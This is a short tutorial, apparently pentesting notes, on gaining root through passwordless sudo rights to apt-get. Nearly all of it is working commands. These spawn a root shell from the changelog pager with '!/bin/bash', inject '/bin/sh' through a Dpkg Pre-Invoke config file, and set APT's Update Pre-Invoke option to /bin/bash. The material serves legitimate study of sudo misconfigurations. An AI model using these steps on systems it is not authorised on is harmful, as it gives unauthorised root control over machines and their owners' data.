apt-get - Privilege escalation

apt-get can be used to escalate privileges when sudo is allowed without password.

How to

1. check the permissions this user has

  • sudo -l

We can see that /usr/bin/apt-get is allowed (NOPASSWD)

2. get into changelog documentation

  • sudo apt-get changelog apt

3. At the bottom type into change to /bin/bash since this document has been opened as root, seems to be “less” Linux utility.

  • !/bin/bash
  • <enter>

After that you immediately change to root log in.

Using apt-get & apt update for privilege escalation

(For this to work the target package (e.g., sl) must not be installed.)

  • TF=$(mktemp)
  • echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
  • sudo apt-get install -c $TF sl

How to

1. Having NOPASSWD rights

  • sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
  • whoami

If you type exit the apt-get update command starts to do its job.

2. using apt

  • sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

For using either apt or apt-get you need sudo access.

sudo -l